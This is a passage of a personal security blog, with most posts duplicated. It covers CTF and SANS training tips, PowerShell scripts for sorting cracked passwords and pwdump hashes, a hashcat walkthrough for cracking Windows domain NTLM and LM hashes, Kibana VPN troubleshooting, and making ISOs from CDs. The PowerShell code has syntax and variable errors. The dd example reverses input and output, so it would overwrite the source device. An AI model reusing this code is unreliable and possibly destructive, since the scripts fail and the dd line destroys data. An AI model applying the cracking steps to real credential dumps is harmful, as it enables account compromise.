I just gave my first talk at Wild West Hackin' Fest. Thanks for letting me present. :)
My spouse pestered me to submit a paper. So I submitted a half thought out idea of telling how a stay-at-home-mom ended up in info sec. I never expected in a million years that my topic would be chosen. I found out in June. I wanted to cancel, but before I could, my spouse took to Twitter and told everyone that I'd been accepted. So, I felt like I had to do this talk. I was scared, though, so I avoided writing anything like a plague. I had an idea of what I wanted to say - a direction I wanted to go in. I think that I failed in that respect. I told part of the story. I didn't say everything that I wanted to say.
If the talk belongs to me- not sure of the etiquette surrounding talks considering this was my first talk ever. I might record it as it's meant to be - when I'm not so nervous. I won't be on camera - it would just be my voice, and maybe slides. I requested that they not record it - they kindly obliged.
I'm slightly disappointed in myself, but also feel a little accomplished because I was brave enough to speak in front of people. I never thought I had it in me. I used to sing in front of crowds, but that's different because you're singing someone else's story - you're not expressing your own ideas. You also get swept away in the music - for me - it's like the room drops away and I'm just left with the music. Speaking on the other hand terrifies me. Weird, I know.
I see some women on Twitter noting why they are afraid to give talks - they're afraid that they won't have anything to say. To them - you probably have something much more important to talk about than being a mom who becomes an info sec pro. I talked about my kids during the talk for heaven's sake. Your journeys, experience, thoughts help people more than you realize. I've seen some of the incredible things that these young women have been up to, and don't understand why they can't see how awesome they are. My suggestion is - give it a shot - you might surprise yourself.
The people here at Wild West Hackin' Fest were so kind to me when the talk was over. They told me I did well - not sure I actually believe that they were sincere, but I didn't hear anything negative. Not saying no one said anything negative, but if they did, I didn't hear it. Submit your papers - be heard. Inspire other people.
Friday, October 26, 2018
Sunday, July 1, 2018
SANS SEC560
Went to training this past week. Took SANS SEC560.
Choose the hotel you stay at wisely. I didn't sleep very well all week. There's always the chance of not sleeping well, but in this case, it was worse than usual. I can't fault the hotel; the beds were comfortable, the rooms were clean, etc. There was just so much noise around, the whole night. I did not stay in the SANS venue this time.
The class itself was great. The instructor was entertaining. He went a little fast, but he had a lot of material to cover. As usual, I was trying to take notes while he spoke. I'm glad I have On-Demand so I can listen to the lecture again from someone else's perspective and pause it when I feel the instructor is going too fast.
Feel like I learned a bit this week. Most of the learning was from doing dumb things.
There is a ctf in it. I can't give away exact answers. Here's a few tips:
Pay attention to the instructor.
Get some sleep. I was not prepared for ctf day. I was so tired, that I kept mistyping stuff. Simple stuff. I wasn't going into the right directory to run things.
Plan out the tools you will use wisely, and put them in the $PATH. This isn't always recommended for production machines, but in the case of VMs in a ctf, this may be a good idea.
Make notes of the tools you used throughout the week. This will not only help you remember what to use, but will also be a handy reference guide for when you're nervous during the ctf. This way, you don't have to flip through the course books. This is also good advice for taking the exam - indexing.
Choose your team wisely. I socially engineered my way into a good team. I took a gamble and I wore my SANS Netwars Tournament of Champions t-shirt and hoodie this week. The instructor made sure to announce that I was in last year's ToC, so people naturally assumed that I probably knew stuff. I was asked to join the team that I wanted. (After my performance yesterday, they are probably wondering how I won NetWars. I wasn't dishonest. It was persistence, Googling, and luck.)
That being said, don't wait for someone to ask you. You should have your team made by Day 4 at the latest.
Watch the people in class. The quiet ones who aren't paying attention are wild cards. They will either be extremely good, or they will be bad. I lucked out. The quiet person in our class was really good.
You want people with different skill sets in your team. I was doing scanning/recon, taking notes - making sure we had good material for a report, cracking passwords because I threw a couple of cores and more memory into my vm. If there was a tie, we'd have to explain how we did things, and sometimes that report is what sets you apart.
The other guys were methodically working on exploiting the machines. I would go in behind them and see if we missed anything. You can scan from each system's perspective. You might see something different from that perspective, because certain machines may be able to talk to each other, and nothing else.
I still ended up rooting a box, because I went in behind the first wave of exploiters in our team and got root on the box while they were trying to get into the next box. You don't always need root, but it's nice to have to be able to get the hashes and crack them.
Don't compete with your teammates. You're there to work as a team, not be the "star".
If you get stuck, this sounds stupid, try the dumbest things you can think of first and work your way up. Example: In tech support, it would be, "Is it powered on? Are the cables plugged in on both ends?", etc. In pen testing, it would be "Is the username set to "password" or other passwords you might already know? Do users have more privileges than they should?, etc." Good privilege escalation guide here: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation and here: https://www.fuzzysecurity.com/tutorials/16.html
Scan the network. Other teams may give clues about what to do next. They may be stuck in a spot that you already have and vice versa.
My team ended up winning, but just barely. I received a beautiful coin to add to my collection. Thus far, I have 2 504 coins, 1 560 coin, and a NetWars coin.
Choose the hotel you stay at wisely. I didn't sleep very well all week. There's always the chance of not sleeping well, but in this case, it was worse than usual. I can't fault the hotel; the beds were comfortable, the rooms were clean, etc. There was just so much noise around, the whole night. I did not stay in the SANS venue this time.
The class itself was great. The instructor was entertaining. He went a little fast, but he had a lot of material to cover. As usual, I was trying to take notes while he spoke. I'm glad I have On-Demand so I can listen to the lecture again from someone else's perspective and pause it when I feel the instructor is going too fast.
Feel like I learned a bit this week. Most of the learning was from doing dumb things.
There is a ctf in it. I can't give away exact answers. Here's a few tips:
Pay attention to the instructor.
Get some sleep. I was not prepared for ctf day. I was so tired, that I kept mistyping stuff. Simple stuff. I wasn't going into the right directory to run things.
Plan out the tools you will use wisely, and put them in the $PATH. This isn't always recommended for production machines, but in the case of VMs in a ctf, this may be a good idea.
Make notes of the tools you used throughout the week. This will not only help you remember what to use, but will also be a handy reference guide for when you're nervous during the ctf. This way, you don't have to flip through the course books. This is also good advice for taking the exam - indexing.
Choose your team wisely. I socially engineered my way into a good team. I took a gamble and I wore my SANS Netwars Tournament of Champions t-shirt and hoodie this week. The instructor made sure to announce that I was in last year's ToC, so people naturally assumed that I probably knew stuff. I was asked to join the team that I wanted. (After my performance yesterday, they are probably wondering how I won NetWars. I wasn't dishonest. It was persistence, Googling, and luck.)
That being said, don't wait for someone to ask you. You should have your team made by Day 4 at the latest.
Watch the people in class. The quiet ones who aren't paying attention are wild cards. They will either be extremely good, or they will be bad. I lucked out. The quiet person in our class was really good.
You want people with different skill sets in your team. I was doing scanning/recon, taking notes - making sure we had good material for a report, cracking passwords because I threw a couple of cores and more memory into my vm. If there was a tie, we'd have to explain how we did things, and sometimes that report is what sets you apart.
The other guys were methodically working on exploiting the machines. I would go in behind them and see if we missed anything. You can scan from each system's perspective. You might see something different from that perspective, because certain machines may be able to talk to each other, and nothing else.
I still ended up rooting a box, because I went in behind the first wave of exploiters in our team and got root on the box while they were trying to get into the next box. You don't always need root, but it's nice to have to be able to get the hashes and crack them.
Don't compete with your teammates. You're there to work as a team, not be the "star".
If you get stuck, this sounds stupid, try the dumbest things you can think of first and work your way up. Example: In tech support, it would be, "Is it powered on? Are the cables plugged in on both ends?", etc. In pen testing, it would be "Is the username set to "password" or other passwords you might already know? Do users have more privileges than they should?, etc." Good privilege escalation guide here: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation and here: https://www.fuzzysecurity.com/tutorials/16.html
Scan the network. Other teams may give clues about what to do next. They may be stuck in a spot that you already have and vice versa.
My team ended up winning, but just barely. I received a beautiful coin to add to my collection. Thus far, I have 2 504 coins, 1 560 coin, and a NetWars coin.
Monday, June 18, 2018
NetWars Tournament of Champions/Imposter Syndrome
Someone was asking for help on the Advisory Board regarding NetWars. I posted about NetWars before, but I didn't post anything about the Tournament of Champions. I found an article written by someone who'd gotten a coin at SANS Rocky Mountain. This person told me that I'm inspirational because I'd won that tournament at SANS Rocky Mountain.
I was avoiding this post because I'm not really proud of my performance at the tournament that I won at and ToC. Some people say that I should just be proud for attending ToC. I didn't feel like I had to do much to get the invite - like it was a lucky break. Don't misunderstand; I learned a lot from NetWars Core Tournament 4 and NetWars continuous, but I wouldn't consider myself a "champion".
People talk about imposter syndrome - some have said that they think that I have it because I have trouble accepting compliments or acknowledging my accomplishments. What if how I feel is real, though? What if people really do assume I know more than I really do? I'm not saying that I can't learn. I'm saying that I still have a lot to learn, and that's ok. Right now, I'm learning blue team stuff because I've been promoted to a Security Analyst position. I thought that I had a lot of stuff to learn before - I'm stacking more plates onto that pile.
Hope to attend NetWars Tournament again soon.
Tips for ToC:
Mr. Skoudis - at the special meeting beforehand - will say, "Work in teams." I didn't follow his advice - my goal was not to win. I wanted to learn. However, if you want to win - join a team. I didn't because I didn't want to weigh my team down. It was my first time playing Netwars Core Tournament 5. In fact, just do exactly what Skoudis says prior to the game.
Other than that, follow the advice for normal NetWars Core Tournament.
Go with the goal of having fun - not winning - and it will be much more enjoyable. I love all of the story line in these tournaments - they keep it interesting. Love the music.
Good luck.
I was avoiding this post because I'm not really proud of my performance at the tournament that I won at and ToC. Some people say that I should just be proud for attending ToC. I didn't feel like I had to do much to get the invite - like it was a lucky break. Don't misunderstand; I learned a lot from NetWars Core Tournament 4 and NetWars continuous, but I wouldn't consider myself a "champion".
People talk about imposter syndrome - some have said that they think that I have it because I have trouble accepting compliments or acknowledging my accomplishments. What if how I feel is real, though? What if people really do assume I know more than I really do? I'm not saying that I can't learn. I'm saying that I still have a lot to learn, and that's ok. Right now, I'm learning blue team stuff because I've been promoted to a Security Analyst position. I thought that I had a lot of stuff to learn before - I'm stacking more plates onto that pile.
Hope to attend NetWars Tournament again soon.
Tips for ToC:
Mr. Skoudis - at the special meeting beforehand - will say, "Work in teams." I didn't follow his advice - my goal was not to win. I wanted to learn. However, if you want to win - join a team. I didn't because I didn't want to weigh my team down. It was my first time playing Netwars Core Tournament 5. In fact, just do exactly what Skoudis says prior to the game.
Other than that, follow the advice for normal NetWars Core Tournament.
Go with the goal of having fun - not winning - and it will be much more enjoyable. I love all of the story line in these tournaments - they keep it interesting. Love the music.
Good luck.
Saturday, March 10, 2018
HackyEaster-Teaser
I didn't know about this challenge, but apparently there is a challenge that is released annually around Easter time. You may want to check it out. It's here:
https://hackyeaster.hacking-lab.com
I completed the teaser challenge several days ago. I'm looking forward to seeing what they come up with for the rest of the challenge.
Be patient with the creators. Apparently it can take some time for them to judge the answers so you can move on, and they are people that volunteer to do so. Thanks to those people that put time into judging the submissions. :)
https://hackyeaster.hacking-lab.com
I completed the teaser challenge several days ago. I'm looking forward to seeing what they come up with for the rest of the challenge.
Be patient with the creators. Apparently it can take some time for them to judge the answers so you can move on, and they are people that volunteer to do so. Thanks to those people that put time into judging the submissions. :)
Saturday, February 24, 2018
Count Number of Unique Passwords Powershell Hashtables
I'm on a password kick lately. I read about hash tables in Powershell. They are so cool. So, I wrote a script that counts the number of unique passwords in a text file that contains usernames and passwords. It also sorts the passwords from the most used to the least used, using the GetEnumerator method and Sort-Object. Keep in mind everyone, I'm still new to Powershell. Someone may have already done this, or there may be more efficient methods. This is what I've learned to this point in time.
#Make a hash table to hold the passwords and count.
$passwordscount = @{}
#Make a variable to hold each of the passwords
$password
#Get the content of the passwords file and add it to a list
$passwordslist = Get-Content plain.txt
#Tell powershell the column number of the plain.txt file that you want in the hash table.
#The computer counts from 0, so it will be one less than the column you want.
#For example, plain.txt has a username and password separated by a column.
#You want column 1. Column 0 is the username.
$passwordscolumnnumber = 1
#For each password in the passwords list, do the following
ForEach($password in $passwordslist){
#Split each line of the plain.txt file into an array, splitting at the colon
#The username is element 0, the password is element 1
$passwordsarray = $password.split(':')
#separate these passwords from the username and count them
$passwordfield = $passwordsarray[$passwordcolumnnumber];
#If this is the first occurrence of a password, add it to the hash table and put 1 in the count
If ($passwordscount[$passwordfield -eq $null]{
$passwordscount[$passwordfield] = 1
}
Else{
#if a password has already been seen, add 1 to it's count
$passwordscount[passwordfield]++
}
}
$passwordscount.GetEnumerator() | Sort-Object -Property Value | Out-File passwordscount.txt
#Make a hash table to hold the passwords and count.
$passwordscount = @{}
#Make a variable to hold each of the passwords
$password
#Get the content of the passwords file and add it to a list
$passwordslist = Get-Content plain.txt
#Tell powershell the column number of the plain.txt file that you want in the hash table.
#The computer counts from 0, so it will be one less than the column you want.
#For example, plain.txt has a username and password separated by a column.
#You want column 1. Column 0 is the username.
$passwordscolumnnumber = 1
#For each password in the passwords list, do the following
ForEach($password in $passwordslist){
#Split each line of the plain.txt file into an array, splitting at the colon
#The username is element 0, the password is element 1
$passwordsarray = $password.split(':')
#separate these passwords from the username and count them
$passwordfield = $passwordsarray[$passwordcolumnnumber];
#If this is the first occurrence of a password, add it to the hash table and put 1 in the count
If ($passwordscount[$passwordfield -eq $null]{
$passwordscount[$passwordfield] = 1
}
Else{
#if a password has already been seen, add 1 to it's count
$passwordscount[passwordfield]++
}
}
$passwordscount.GetEnumerator() | Sort-Object -Property Value | Out-File passwordscount.txt
Thursday, February 22, 2018
Powershell: Convert JtR Formatted Text file to Hashcat LM or NTLM
I said on my recent post about cracking domain passwords with hashcat, that you could probably convert from JtR Format using Powershell. By JtR format, I mean username:uid:lm hash:ntlm hash on each line in a text file. Someone corrected me and stated that this is pwdump format. I learn new things every day. They also cleared up a misunderstanding about how the LM hashes work. Thanks again, loyal reader!
Update: Someone stated that there is a switch/flag to so that JtR/pwdump formatted hashes could be used in hashcat. Does anyone happen to know what that switch/flag is? I haven't had luck finding it.
I think that I've written a script that may convert JtR formatted files to hash cat lm or ntlm.
#The following hash means that the lm hash is blank. This occurs because the password is
#longer than 14 characters.
$blanklmhash = "aad3b435b51404eeaad3b435b51404ee"
#Create arrays to hold the lm hashes, ntlm hashes, and ntlm hashes with lm hashes.
$lmhashes = @()
$ntlmhashes = @()
$ntlmhasheswlm = @()
#Get the JtR formatted hashes from a text file.
$hasheslist = Get-Content hashes.txt
#For each JtR formatted hash in the hashes list, do the following
ForEach($JtRhash in $hasheslist){
#Split the JtRhash into an array of four pieces. Element [0] of the array is the username.
#Element[1] of the array is the uid. Element [2] of the array is the lm hash. Element [3] of
#the array is the ntlm hash.
$JtRhashArray = $JtRhash.split(':')
#if the LM hash is that blank hash in the hashes file, it means that LM is either disabled or
#the password is greater than 14 digits. LM can't handle more than 14 digits. So, add
#the LM hashes that are not that blank password to the $lmhashes array. Add their ntlm
#counterparts to the ntlmhasheswlm array. I'm doing this because the lm cracked
#passwords are uppercase because of how lm works. These lm hashes can be used as
#a dictionary/rules attack against their ntlm counterparts - making it faster to crack the
#ntlm passwords associated with them.
If (!($JtRhashArray[2] -eq $blanklmhash)){
$lmhashes += $JtRhashArray[0] + ":" + JtRhashArray[2]
$ntlmhasheswlm += $JtRhashArray[0] + ":" + JtRhashArray[3]
}
#otherwise, add the password to the $ntlmhashes array.
Else{
$ntlmhashes += $JtRhashArray[0] + ":" + JtRhashArray[3]
}
}
#output the lm hashes, ntlm hashes, and ntlm hashes with lm hashes to files.
$lmhashes | Out-File lmhashes.txt
$ntlmhashes | Out-File ntlmhashes.txt
$ntlmhasheswlm | Out-File ntlmhasheswlm.txt
Update: Someone stated that there is a switch/flag to so that JtR/pwdump formatted hashes could be used in hashcat. Does anyone happen to know what that switch/flag is? I haven't had luck finding it.
I think that I've written a script that may convert JtR formatted files to hash cat lm or ntlm.
#The following hash means that the lm hash is blank. This occurs because the password is
#longer than 14 characters.
$blanklmhash = "aad3b435b51404eeaad3b435b51404ee"
#Create arrays to hold the lm hashes, ntlm hashes, and ntlm hashes with lm hashes.
$lmhashes = @()
$ntlmhashes = @()
$ntlmhasheswlm = @()
#Get the JtR formatted hashes from a text file.
$hasheslist = Get-Content hashes.txt
#For each JtR formatted hash in the hashes list, do the following
ForEach($JtRhash in $hasheslist){
#Split the JtRhash into an array of four pieces. Element [0] of the array is the username.
#Element[1] of the array is the uid. Element [2] of the array is the lm hash. Element [3] of
#the array is the ntlm hash.
$JtRhashArray = $JtRhash.split(':')
#if the LM hash is that blank hash in the hashes file, it means that LM is either disabled or
#the password is greater than 14 digits. LM can't handle more than 14 digits. So, add
#the LM hashes that are not that blank password to the $lmhashes array. Add their ntlm
#counterparts to the ntlmhasheswlm array. I'm doing this because the lm cracked
#passwords are uppercase because of how lm works. These lm hashes can be used as
#a dictionary/rules attack against their ntlm counterparts - making it faster to crack the
#ntlm passwords associated with them.
If (!($JtRhashArray[2] -eq $blanklmhash)){
$lmhashes += $JtRhashArray[0] + ":" + JtRhashArray[2]
$ntlmhasheswlm += $JtRhashArray[0] + ":" + JtRhashArray[3]
}
#otherwise, add the password to the $ntlmhashes array.
Else{
$ntlmhashes += $JtRhashArray[0] + ":" + JtRhashArray[3]
}
}
#output the lm hashes, ntlm hashes, and ntlm hashes with lm hashes to files.
$lmhashes | Out-File lmhashes.txt
$ntlmhashes | Out-File ntlmhashes.txt
$ntlmhasheswlm | Out-File ntlmhasheswlm.txt
Hashcat: Cracking Windows Domain Hashes
Learning how to use hashcat. Sharing some of my experience with it. I've used JtR and Cain and Abel. Hashcat I've used maybe once or twice. I'm not going to go into depth about how to dump the hashes. That is not the purpose of this post. If you're interested in that, Rapid7, the creator of Metasploit has some good tutorials about how to use their modules to dump password hashes from Domain Controllers.
First, I had to manipulate the data that I had gathered in order for hash cat to understand it. Many of the modules in Metasploit dump the hashes in JtR (John the Ripper) format. I've seen some that dump the hashes in hashcat format, but not a lot. Also, note, I may be missing some settings in Metasploit because I'm still new to using it. This still may be useful for other purposes.
For windows domain hashes, JtR format looks like the following:
username:uid:lm hash:ntlm hash
Note: There is a blank hash for lm hashes. That blank hash is aad3b435b51404eeaad3b435b51404ee. LM passwords are really easy to crack.
Someone was kind enough to explain the LM password being that blank hash. That means that the password is greater than 14 characters. Thanks loyal reader!
Sometimes it's useful to first crack LM passwords - if they are available, then crack the NTLM passwords using a dictionary consisting of the LM passwords and what are known as mangling rules in JtR.
The format that hashcat understands is "username:lm" hash or "username:ntlm" hash. Note: This is as long as the --username switch is being used in the command to use hashcat, other wise, you'll get an error about the hash length.
I went about converting it the long way. There are much easier ways. I imagine I could use Powershell to remove the uid and one or the other of the password hash types. Or, I could have simply used officetohashcat.py.
Use CSV with HashCat (Use at your own risk. I haven't thoroughly tested this- it seems to work fine so far.)
I changed the List Separator in the Region settings in the Control Panel to use a : as a list separator instead of a comma. When I save files as csv files, it will be a colon separated list, not a comma separated list.
I used Microsoft Excel 2016 to separate the data for me. I like the sorting and filtering options with Excel. To bring in a delimited text file - in my case it was formatted with colons, you go to the Data tab>Get External Data>From Text File. Select the text file that contains the hashes from the list. Follow the directions in the wizard. On one part, it will ask you how it is delimited: Choose Other, then type :.
One the data was imported into Excel, I sorted out the LM passwords. (I could tell that they were LM because they didn't have the blank LM hash. The hashes were different.) I deleted the uid and NTLM columns. I saved that into a lm_hashes.csv file.
Then I separated out the NTLM hashes. I deleted the uid and LM columns. I saved this as ntlm_hashes.csv file.
If either of these files are opened in Notepad, they should be colon delimited. Might check before trying to crack them.
Now the fun begins. :)
Hashcat takes some getting used to. It is picky about the order of things, attack mode, formats of the hashes, the type of attack, etc.
Hashcat Dictionary attack
-a 0 : straight mode - this takes hashes from a dictionary
-m : the type of password hash. 1000 is NTLM, 3000 is LM, 900 is MD4
-o : an output file for the cracked hashes - If -o is not specified, the cracked hashes/passwords will be in hashcat.potfile note if you want to save the hashes in a certain format, you can do that after cracking them with --show and other options.
Assuming hashcat is in the PATH. Otherwise, specify a full path.
hashcat64.exe -a 0 -m 1000 ntlm_hashes.csv dictionary.txt -o ntlm_cracked.txt
Note: You can specify more than one dictionary. Just add the pathname/file after the first one.
Hashcat Brute-Force (Mask Attack)
-a 3 : brute-force (mask) attack
-1 : user-defined character set. ?u - Uppercase letters, ?d - digits, ?s - symbols
--incremental : don't just do a password length of the mask. Do 1 character, 2 characters, 3 characters, etc with the same user-defined character set. If a mask is set that is large - like more than 6 characters, you may get an error about an integer overflow detected. This means that hashcat can't handle that mask. It may be wise not to use a large mask anyway - because those hashes may not be cracked in your lifetime. I always use incremental. If it ever gets to a point where it estimates a long time - weeks or months to crack, I don't do it. There are better ways. Using rules to manipulate dictionary words, for instance.
hashcat64.exe -a 3 -m 1000 -1 ?u?d?s ntlm_hashes.csv -o ntlm_cracked.txt ?1?1?1?1?1?1?1? --incremental
There is a -p option which specifies a different delimiter for the hash file/output file, but I've not had good luck with it. I recommend having your data the way it needs to be before putting it into hashcat.
Show Loot (IE the Cracked Passwords)
hashcat64.exe -m 1000 --show hashcat.potfile
Note: That -m is the password type. It must match the type of hashes that were cracked.
That last bit, hashcat.potfile is assuming you didn't add an output file when you were cracking. If you did, they will be in that path/filename. I think that it still saves it to the pot file as well, but remember to add the path/filename if you aren't in the same directory as the hashcat.potfile. It's usually in the same place that the hashcat binary is stored.
Show the Cracked Hashes in a Certain Format
hashcat64.exe -m 1000 --show --potfile-path hashcat.potfile --username -o ntlm_cracked.txt --outfile-format 2 C:\Users\user\ntlm_hashes.csv
--potfile-path : specifies where the loot is.
--username : specifies to ignore usernames. This must be added if there are usernames in the original file.
-o : specifies an output file.
--outfile-format 2 : in this case, it shows the cracked hashes as plain text passwords in the file only. If the original file has users, it will have user:password in the output file.
C:\Users\user\ntlm_hashes.csv : specifies the original file that contains the hashes.
I will add how to do cracking with rules later. I haven't experimented with that functionality just yet.
First, I had to manipulate the data that I had gathered in order for hash cat to understand it. Many of the modules in Metasploit dump the hashes in JtR (John the Ripper) format. I've seen some that dump the hashes in hashcat format, but not a lot. Also, note, I may be missing some settings in Metasploit because I'm still new to using it. This still may be useful for other purposes.
For windows domain hashes, JtR format looks like the following:
username:uid:lm hash:ntlm hash
Note: There is a blank hash for lm hashes. That blank hash is aad3b435b51404eeaad3b435b51404ee. LM passwords are really easy to crack.
Someone was kind enough to explain the LM password being that blank hash. That means that the password is greater than 14 characters. Thanks loyal reader!
Sometimes it's useful to first crack LM passwords - if they are available, then crack the NTLM passwords using a dictionary consisting of the LM passwords and what are known as mangling rules in JtR.
The format that hashcat understands is "username:lm" hash or "username:ntlm" hash. Note: This is as long as the --username switch is being used in the command to use hashcat, other wise, you'll get an error about the hash length.
I went about converting it the long way. There are much easier ways. I imagine I could use Powershell to remove the uid and one or the other of the password hash types. Or, I could have simply used officetohashcat.py.
Use CSV with HashCat (Use at your own risk. I haven't thoroughly tested this- it seems to work fine so far.)
I changed the List Separator in the Region settings in the Control Panel to use a : as a list separator instead of a comma. When I save files as csv files, it will be a colon separated list, not a comma separated list.
I used Microsoft Excel 2016 to separate the data for me. I like the sorting and filtering options with Excel. To bring in a delimited text file - in my case it was formatted with colons, you go to the Data tab>Get External Data>From Text File. Select the text file that contains the hashes from the list. Follow the directions in the wizard. On one part, it will ask you how it is delimited: Choose Other, then type :.
One the data was imported into Excel, I sorted out the LM passwords. (I could tell that they were LM because they didn't have the blank LM hash. The hashes were different.) I deleted the uid and NTLM columns. I saved that into a lm_hashes.csv file.
Then I separated out the NTLM hashes. I deleted the uid and LM columns. I saved this as ntlm_hashes.csv file.
If either of these files are opened in Notepad, they should be colon delimited. Might check before trying to crack them.
Now the fun begins. :)
Hashcat takes some getting used to. It is picky about the order of things, attack mode, formats of the hashes, the type of attack, etc.
Hashcat Dictionary attack
-a 0 : straight mode - this takes hashes from a dictionary
-m : the type of password hash. 1000 is NTLM, 3000 is LM, 900 is MD4
-o : an output file for the cracked hashes - If -o is not specified, the cracked hashes/passwords will be in hashcat.potfile note if you want to save the hashes in a certain format, you can do that after cracking them with --show and other options.
Assuming hashcat is in the PATH. Otherwise, specify a full path.
hashcat64.exe -a 0 -m 1000 ntlm_hashes.csv dictionary.txt -o ntlm_cracked.txt
Note: You can specify more than one dictionary. Just add the pathname/file after the first one.
Hashcat Brute-Force (Mask Attack)
-a 3 : brute-force (mask) attack
-1 : user-defined character set. ?u - Uppercase letters, ?d - digits, ?s - symbols
--incremental : don't just do a password length of the mask. Do 1 character, 2 characters, 3 characters, etc with the same user-defined character set. If a mask is set that is large - like more than 6 characters, you may get an error about an integer overflow detected. This means that hashcat can't handle that mask. It may be wise not to use a large mask anyway - because those hashes may not be cracked in your lifetime. I always use incremental. If it ever gets to a point where it estimates a long time - weeks or months to crack, I don't do it. There are better ways. Using rules to manipulate dictionary words, for instance.
hashcat64.exe -a 3 -m 1000 -1 ?u?d?s ntlm_hashes.csv -o ntlm_cracked.txt ?1?1?1?1?1?1?1? --incremental
There is a -p option which specifies a different delimiter for the hash file/output file, but I've not had good luck with it. I recommend having your data the way it needs to be before putting it into hashcat.
Show Loot (IE the Cracked Passwords)
hashcat64.exe -m 1000 --show hashcat.potfile
Note: That -m is the password type. It must match the type of hashes that were cracked.
That last bit, hashcat.potfile is assuming you didn't add an output file when you were cracking. If you did, they will be in that path/filename. I think that it still saves it to the pot file as well, but remember to add the path/filename if you aren't in the same directory as the hashcat.potfile. It's usually in the same place that the hashcat binary is stored.
Show the Cracked Hashes in a Certain Format
hashcat64.exe -m 1000 --show --potfile-path hashcat.potfile --username -o ntlm_cracked.txt --outfile-format 2 C:\Users\user\ntlm_hashes.csv
--potfile-path : specifies where the loot is.
--username : specifies to ignore usernames. This must be added if there are usernames in the original file.
-o : specifies an output file.
--outfile-format 2 : in this case, it shows the cracked hashes as plain text passwords in the file only. If the original file has users, it will have user:password in the output file.
C:\Users\user\ntlm_hashes.csv : specifies the original file that contains the hashes.
I will add how to do cracking with rules later. I haven't experimented with that functionality just yet.
Thursday, February 15, 2018
K For Troubleshooting
People think of Kibana as this awesome data visualization and exploration tool. What does that even mean? Considering the breadth of logs that can be fed into Kibana, that can mean many things.
Today, I'm going to explore a real use that may not be normally considered. Troubleshooting.
Fortigate VPN tunnels, for example, have fairly explicit error logs. If you aren't used to reading them, they can be annoying to understand. For example, "vpn SA peer proposal does not match local policy" - in other words, "Hey, your firewall rules may be blocking this traffic." At least some are easily understood, like "probable preshared key mismatch", for example.
If you have these logs going into the ELK stack, you can use Kibana to find these errors for you, so all you would have to do is look at a Visualization or Dashboard when you arrive at work and periodically throughout the day - fix the VPNs before anyone even knows there is a problem and have an awesome day - not having to fight those fires when some random person mentions them.
In order to show only the down VPNs, on the Discover page, I showed only the firewall logs, and did a search for "probable preshared key mismatch". I saved that search.
When I created the visualization, I chose the option to create the visualization from a saved search, and selected the "Probable Preshared Key Mismatch" saved search.
I used a data table because if you're working in a large environment, there might not just be a couple of VPN tunnels down, there could be a lot of them.
For the metric, I used count - this tells the number of times that this error was seen per bucket.
For the bucket, I used the Terms bucket - VPNDeviceName. For the sub-bucket, I used the Terms bucket - VpnTunnelName so that we knew which specific tunnels were down. (No sense in fixing every tunnel on the device if only one is down.) These make up the columns in the data table.
I tested the visualization by changing the time frame from the last fifteen minutes to the last day. (If there weren't any down in the last few days, change the time frame to the last few days - trust me, they go down quite a bit - you will eventually see at least one down.) Sure enough, it showed VPN tunnels that had been down in the last day because of a "preshared key mismatch".
Then I did the same steps for the other common errors that happen when VPN tunnels go down.
If they ever change the error messages, I will have to change these, so if there is a better way to do it, please let me know.
Once I saved the visualizations, I saved them to a Dashboard so that I could easily see what was down and why. This saved a lot of troubleshooting time.
Another awesome thing about this: If you change this visualization a small amount, it can be used as a metric to show how often vpn tunnels are down and how often an error occurs. It can be used to find if these vpns going down is a symptom of an even larger problem.
What other ways have people found to use Kibana?
Today, I'm going to explore a real use that may not be normally considered. Troubleshooting.
Fortigate VPN tunnels, for example, have fairly explicit error logs. If you aren't used to reading them, they can be annoying to understand. For example, "vpn SA peer proposal does not match local policy" - in other words, "Hey, your firewall rules may be blocking this traffic." At least some are easily understood, like "probable preshared key mismatch", for example.
If you have these logs going into the ELK stack, you can use Kibana to find these errors for you, so all you would have to do is look at a Visualization or Dashboard when you arrive at work and periodically throughout the day - fix the VPNs before anyone even knows there is a problem and have an awesome day - not having to fight those fires when some random person mentions them.
In order to show only the down VPNs, on the Discover page, I showed only the firewall logs, and did a search for "probable preshared key mismatch". I saved that search.
When I created the visualization, I chose the option to create the visualization from a saved search, and selected the "Probable Preshared Key Mismatch" saved search.
I used a data table because if you're working in a large environment, there might not just be a couple of VPN tunnels down, there could be a lot of them.
For the metric, I used count - this tells the number of times that this error was seen per bucket.
For the bucket, I used the Terms bucket - VPNDeviceName. For the sub-bucket, I used the Terms bucket - VpnTunnelName so that we knew which specific tunnels were down. (No sense in fixing every tunnel on the device if only one is down.) These make up the columns in the data table.
I tested the visualization by changing the time frame from the last fifteen minutes to the last day. (If there weren't any down in the last few days, change the time frame to the last few days - trust me, they go down quite a bit - you will eventually see at least one down.) Sure enough, it showed VPN tunnels that had been down in the last day because of a "preshared key mismatch".
Then I did the same steps for the other common errors that happen when VPN tunnels go down.
If they ever change the error messages, I will have to change these, so if there is a better way to do it, please let me know.
Once I saved the visualizations, I saved them to a Dashboard so that I could easily see what was down and why. This saved a lot of troubleshooting time.
Another awesome thing about this: If you change this visualization a small amount, it can be used as a metric to show how often vpn tunnels are down and how often an error occurs. It can be used to find if these vpns going down is a symptom of an even larger problem.
What other ways have people found to use Kibana?
Sunday, January 28, 2018
Making ISOs Out of Old Game CDs
First of all, I want to point out - I'm not sure about the legality of this. I happen to own some old games. Not sure how long they will last on CDs. I have kids and I can't tell you how many CDs/DVDs they have destroyed. I want to save them because I happen to like playing older games, so I'm converting them from CDs to ISOs for my use only. I'm not distributing them.
If you have a Mac, you can use Disk Utility to convert the CDs to .cdr files. If the games are made for other devices, you will have to convert those .cdr files to .isos. I didn't have much luck converting the .cdr files to .isos with the hdiutil command. The isowas fine for my Mac, but for some reason, it would not open on Windows devices. The Windows devices kept popping up a message that said, "corrupt iso image". That command is:
hdiutil convert <game>.cdr -format -UDTO -o <game>.iso
Maybe others will have better luck?
So, I turned to Ubuntu. There's a nice command on there called, "mkisofs". The biggest hurdle I had with this was finding a CD-Rom drive my Ubuntu machine would read. Other than that, it went without a hitch. dd could also be used, but it wasn't good for this case because you have to unmount the device to create an image from it. I'm using an external drive.
The dd command is:
dd of=<directory/of/cd/rom> if=<output/directory/andfile.iso>
Ubuntu auto mounts it. Yes, I know, umount, then run dd...
With mkisofs, you don't have to unmount the drive.
The exact command I used was:
mkisofs -lJR -o <gamename.iso> <directoryname>
That's a lower-case L by the way, not a upper-case I.
You can specify multiple directories. Just make sure that for a game for instance, that it has the same directory structure that the installer expects. Another issue you may come across is copyright protections. Sometimes this won't work because of that. Fortunately, for many of my games, I didn't have an issue.
